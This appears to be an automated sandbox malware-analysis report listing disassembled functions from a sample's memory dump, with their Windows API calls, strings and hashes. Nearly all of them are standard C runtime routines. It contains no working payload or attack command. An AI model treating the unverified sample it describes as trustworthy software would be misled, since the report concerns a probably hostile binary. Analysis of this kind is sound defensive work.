Opcode Fuzzy Hash: 02c98f535dc4d4497b3986de27da475f19f7fe4b5ed185c7709bbfdf8f807088
Instruction Fuzzy Hash: 01D23A71E082298FDB65CF28DD407EAB7B6EB45304F1441EAD40EE7280E775AE858F91

Function 0063C085 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00634EB1: GetLastError.KERNEL32(?,00000008,00639482), ref: 00634EB5
Part of subcall function 00634EB1: SetLastError.KERNEL32(00000000,0064C480,00000024,00630419), ref: 00634F57

GetACP.KERNEL32(?,?,?,?,?,?,00631848,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0063C146
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00631848,?,?,?,00000055,?,-00000050,?,?), ref: 0063C171
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0063C2D4

Strings

||d, xrefs: 0063C0C7
utf8, xrefs: 0063C243

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8$||d
API String ID: 607553120-1839698243
Opcode ID: 5fb0c7674a76c917e2503e0194303992901be1f16c4199d346aaf7a34d625780
Instruction ID: 4be4fcf57ce520529c0923ea8df680e87751a45663921c8f0d4e78727a4ed25a
Opcode Fuzzy Hash: 5fb0c7674a76c917e2503e0194303992901be1f16c4199d346aaf7a34d625780
Instruction Fuzzy Hash: 29710B31A00702AADB24BB75DC42FE773AAEF45720F14442DF505E7281EBB4EA4197E4

Function 0063C814 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,0063CB32,00000002,00000000,?,?,?,0063CB32,?,00000000), ref: 0063C8AD
GetLocaleInfoW.KERNEL32(?,20001004,0063CB32,00000002,00000000,?,?,?,0063CB32,?,00000000), ref: 0063C8D6
GetACP.KERNEL32(?,?,0063CB32,?,00000000), ref: 0063C8EB

Strings

OCP, xrefs: 0063C868
ACP, xrefs: 0063C832

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 543877faf9e628753ed1e5352648cf7417359ec370cad3ef16d5c7c91b2cb1d4
Instruction ID: 1968e0f415da67660986e372adde3837c32202fd0b72b36b5ff9bd02eb78c096
Opcode Fuzzy Hash: 543877faf9e628753ed1e5352648cf7417359ec370cad3ef16d5c7c91b2cb1d4
Instruction Fuzzy Hash: 05215E22A00101AADB249F65D901AD77AA7AF54B70F568564F90AFB311EB32DF41D3D0

Function 0062FEF0 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Strings

Gc, xrefs: 00630233, 00630211
Gc, xrefs: 0062FF0B, 0063008E, 006302B7, 00630250, 006300DD

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID:
String ID: Gc$Gc
API String ID: 0-2169354771
Opcode ID: b78e9bc5a25061f1abca4818c36b3245c47596756df3441acd3b4668cd2eb70a
Instruction ID: bc14f21a40b96910c942b84315ca7d43721608e890b0df0075ea2c7ffc5b44db
Opcode Fuzzy Hash: b78e9bc5a25061f1abca4818c36b3245c47596756df3441acd3b4668cd2eb70a
Instruction Fuzzy Hash: 65F14071E002199FEF14CFA8D894AEEB7B2FF89314F158269E815A7381D7309E45CB94

Function 00633C92 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00633D1F

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 40f0e063838af908aa0c23a01ee66fead67f3bdac29e3056e6e3dd52480c6ad0
Instruction ID: c59ddb4efb75e201bbb72699a5922d8cd9d140414e8d2b12298a4593094482dc
Opcode Fuzzy Hash: 40f0e063838af908aa0c23a01ee66fead67f3bdac29e3056e6e3dd52480c6ad0
Instruction Fuzzy Hash: 93B12772E042659FDB158F68C891BEEBBB6EF55310F14816EE805AF341D2349E06CBE0

Function 00627922 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0062792E
IsDebuggerPresent.KERNEL32 ref: 006279FA
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00627A13
UnhandledExceptionFilter.KERNEL32(?), ref: 00627A1D

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: a39b72bda79d0b6f1efdad3f856aaa534233f0d568c0316942122e8353a4ecb3
Instruction ID: cb493bc90e7985a1ff8e2e6df42a5a496bfa72ecba250c7da6bfe3ec3d52aa15
Opcode Fuzzy Hash: a39b72bda79d0b6f1efdad3f856aaa534233f0d568c0316942122e8353a4ecb3
Instruction Fuzzy Hash: 0531F775D062289BDB60DFA4DD49BCDBBB8AF08700F1041EAE40CAB250EB709B858F45

Function 0063C498 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00634EB1: GetLastError.KERNEL32(?,00000008,00639482), ref: 00634EB5
Part of subcall function 00634EB1: SetLastError.KERNEL32(00000000,0064C480,00000024,00630419), ref: 00634F57

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0063C4EC
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0063C536
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0063C5FC

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 64f8cd4780afbc4adb8c81063684e160d218e820cb04d066fc954bae03ca1172
Instruction ID: 24685c0772a26192c29c1a95e2f78ab8825e0d97a912fc6695ed8b0a0c832549
Opcode Fuzzy Hash: 64f8cd4780afbc4adb8c81063684e160d218e820cb04d066fc954bae03ca1172
Instruction Fuzzy Hash: 446195729002179FDF68DF24CC82BBA77AAEF05320F108179F905E6685E774E951CB94

Function 0062DA73 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0062DB6B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0062DB75
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0062DB82

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1bab7450acca1c398571bfb89ace22af8cce682e399f3bdff8dc7376f1ae5e27
Instruction ID: 743696c9e2f79fe406a3d07204274057b8e96536952e521e0c884b73b2d2aa8e
Opcode Fuzzy Hash: 1bab7450acca1c398571bfb89ace22af8cce682e399f3bdff8dc7376f1ae5e27
Instruction Fuzzy Hash: 9B31C474901628ABCB61DF64EC89BCCBBB9BF18710F5041DAE41CA7290EB749F858F44

Function 0063622B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,006323AE,?,20001004,00000000,00000002,?,?,006319B0), ref: 0063625F

Strings

R[b, xrefs: 0063624A

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: R[b
API String ID: 2299586839-1787471655
Opcode ID: caaa77e9b858687b7488eda8caa1e4859970838165a7b1d54acd7cde06a37830
Instruction ID: cc5fe916047a97c35cccc85228a58204f11e1a76b7a558dd12e7ea8025d0f6a9
Opcode Fuzzy Hash: caaa77e9b858687b7488eda8caa1e4859970838165a7b1d54acd7cde06a37830
Instruction Fuzzy Hash: 48E04F36500228BBCF122F61DC08AAE7F2BEF45760F01C014FD0566221CB718E21AAE5

Function 0063572C Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00635727,?,?,00000008,?,?,006415F5,00000000), ref: 00635959

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 3e574824ec1b0c67d3763f71f88391b901adc048d2c096bcaf94881bc2ddaf5d
Instruction ID: b417a481175eb663ce9686596ebc89ef16fa41c0448bc91e13e426c4251d4cff
Opcode Fuzzy Hash: 3e574824ec1b0c67d3763f71f88391b901adc048d2c096bcaf94881bc2ddaf5d
Instruction Fuzzy Hash: BAB13D35610A04DFD715CF28C486BA57BE2FF45364F258659E89ACF3A1C335E992CB80

Function 0062729C Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006272B2

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: d32996e609ec5e52446de85a3bf1a748372826c75b7c8b777c123e254fe29ca8
Instruction ID: 487b4ec1dcd60258af151d734752d779c0a84103436731614edb54fb62d5bd1a
Opcode Fuzzy Hash: d32996e609ec5e52446de85a3bf1a748372826c75b7c8b777c123e254fe29ca8
Instruction Fuzzy Hash: 98A18CB5E05615CFDB18CF68E882AAABBF2FB49714F14A16ED409E73A0C7349841CF50

Function 00639ABF Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e689c9a1e91ad08a13cb36482d4d74f25be7e0837867fc9a23f0f586d431b7e
Instruction ID: fec5c168fc5d06108d53ab75fbe34b6ca745fc2f8848d645dfa993585b203d46
Opcode Fuzzy Hash: 0e689c9a1e91ad08a13cb36482d4d74f25be7e0837867fc9a23f0f586d431b7e
Instruction Fuzzy Hash: A431D976900219AFCB20DFA8DC85DFBB7BEEB84714F144558F90597245E670AE40CFA4

Function 0062CAF2 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 0062CC80

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: ba114e660d621db906c3d6c3a387f7ccbc5e9dcc3ef19a739f16b9afe783f5cb
Instruction ID: 04dccbdcf2b6a641998dda1de873f1c9aed0449914d8f1ed0a01e30b7d10710d
Opcode Fuzzy Hash: ba114e660d621db906c3d6c3a387f7ccbc5e9dcc3ef19a739f16b9afe783f5cb
Instruction Fuzzy Hash: F9C1B270600E668FCB24CF28E4916BEBBB3AF45321F244A1DD4969B791C731AD46CF91

Function 0063C6EB Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00634EB1: GetLastError.KERNEL32(?,00000008,00639482), ref: 00634EB5
Part of subcall function 00634EB1: SetLastError.KERNEL32(00000000,0064C480,00000024,00630419), ref: 00634F57

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0063C73F

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 949d9671f7142102a8c81ff06d92fe784d00dd29154a442a9e41af481efc8c87
Instruction ID: 64ec7b6642fc175e36196ff341214e10953f9e48a5e00f7c8d4516ff0fe3e29b
Opcode Fuzzy Hash: 949d9671f7142102a8c81ff06d92fe784d00dd29154a442a9e41af481efc8c87
Instruction Fuzzy Hash: 0421B636605206ABEB58AF25DC42ABA73BAEF45360F10007EFD05E6241EB34ED018F94

Function 0063C372 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00634EB1: GetLastError.KERNEL32(?,00000008,00639482), ref: 00634EB5
Part of subcall function 00634EB1: SetLastError.KERNEL32(00000000,0064C480,00000024,00630419), ref: 00634F57

EnumSystemLocalesW.KERNEL32(0063C498,00000001,00000000,?,-00000050,?,0063CAC9,00000000,?,?,?,00000055,?), ref: 0063C3E4

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 97d865c76b31536395c4a8becec925c744d4569459b6657f683ecf1798addaef
Instruction ID: 852e475ed93d51748d1f5ff076ae3dc752bf9fd4dd0a7d07b3c6ca06c326ce19
Opcode Fuzzy Hash: 97d865c76b31536395c4a8becec925c744d4569459b6657f683ecf1798addaef
Instruction Fuzzy Hash: 0911253B2007015FEB189F38C8A15BABBA2FF80768F14842CE94797B40D771B942C780

Function 0063C91A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00634EB1: GetLastError.KERNEL32(?,00000008,00639482), ref: 00634EB5
Part of subcall function 00634EB1: SetLastError.KERNEL32(00000000,0064C480,00000024,00630419), ref: 00634F57

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0063C6B4,00000000,00000000,?), ref: 0063C946

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 706e9b63288b6c980824cf551726e9a4c47639f9b6a58b91679fe290326a3d9d
Instruction ID: 7c838d769966529704cc54bf7233401976585e55fdd1e67735f8e6c63b6c8134
Opcode Fuzzy Hash: 706e9b63288b6c980824cf551726e9a4c47639f9b6a58b91679fe290326a3d9d
Instruction Fuzzy Hash: 40F0A937500611BBDB245665C805BFAB75AEB40774F164428FD56B72C0DA74FE41C7D0

Function 0063C40D Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00634EB1: GetLastError.KERNEL32(?,00000008,00639482), ref: 00634EB5
Part of subcall function 00634EB1: SetLastError.KERNEL32(00000000,0064C480,00000024,00630419), ref: 00634F57

EnumSystemLocalesW.KERNEL32(0063C6EB,00000001,?,?,-00000050,?,0063CA8D,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0063C457

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: fd720321e11bc812d58d86843d75cd6616825ef1726d18b037c1345648e2a0d9
Instruction ID: 4361a22a5bb2003d389c14e8fa4851fbf38860701b7d78cf675f327c5a1a11c3
Opcode Fuzzy Hash: fd720321e11bc812d58d86843d75cd6616825ef1726d18b037c1345648e2a0d9
Instruction Fuzzy Hash: 22F022362003045FDB245F38DC91ABABBD2EB81B78F05802CF9069B681C671AC02C790

Function 00635D7F Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0062DDC1: EnterCriticalSection.KERNEL32(?,?,00634B89,?,0064C2E0,00000008,00634D4D,?,0062C446,?), ref: 0062DDD0

EnumSystemLocalesW.KERNEL32(00635D72,00000001,0064C3A0,0000000C,00636127,00000000), ref: 00635DB7

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 0be46f9c9a5cb5dbdcfaa3a92ad5da6d9c01554f1fafce6a57ee9398d5ea6305
Instruction ID: 1bc7e02672c20e0d60dc5265bb96a0b8af7365b08480673722132913d44b2434
Opcode Fuzzy Hash: 0be46f9c9a5cb5dbdcfaa3a92ad5da6d9c01554f1fafce6a57ee9398d5ea6305
Instruction Fuzzy Hash: 27F04976A00614EFD700EF98E842B9D7BB2EB45761F20511AF4019B2A1C7B55944CF88

Function 0063C327 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

